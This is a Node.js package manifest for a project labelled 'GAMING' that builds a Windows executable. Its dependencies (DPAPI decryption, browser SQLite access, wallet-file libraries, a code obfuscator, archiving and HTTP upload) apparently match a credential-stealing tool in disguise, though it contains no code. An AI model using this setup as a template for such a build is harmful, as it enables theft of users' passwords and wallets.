{
  "name": "client",
  "version": "1.0.0",
  "description": "GAMING",
  "main": "index.js",
  "bin": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "run": "node index.js"
  },
  "pkg": {
    "assets": [
      "./node_modules/sqlite3/lib/binding/napi-v6-win32-unknown-x64/node_sqlite3.node",
      "./node_modules/win-dpapi/build/Release/node-dpapi.node",
      "./node_modules/sql.js/dist/sql-wasm.wasm"
    ],
    "targets": [
      "node16-win-x64"
    ]
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "@angablue/exe": "^1.1.6",
    "archiver": "^5.3.1",
    "axios": "^0.27.2",
    "form-data": "^4.0.0",
    "js-confuser": "^1.5.4",
    "node-forge": "^1.3.1",
    "node-gyp": "^9.1.0",
    "node-passworder": "^2.0.4",
    "path": "^0.12.7",
    "seco-file": "^1.2.0",
    "sql.js": "^1.8.0",
    "sqlite3": "^5.0.11",
    "win-dpapi": "^1.1.0",
    "winreg": "^1.2.4"
  },
  "pkgVersion": 3
}
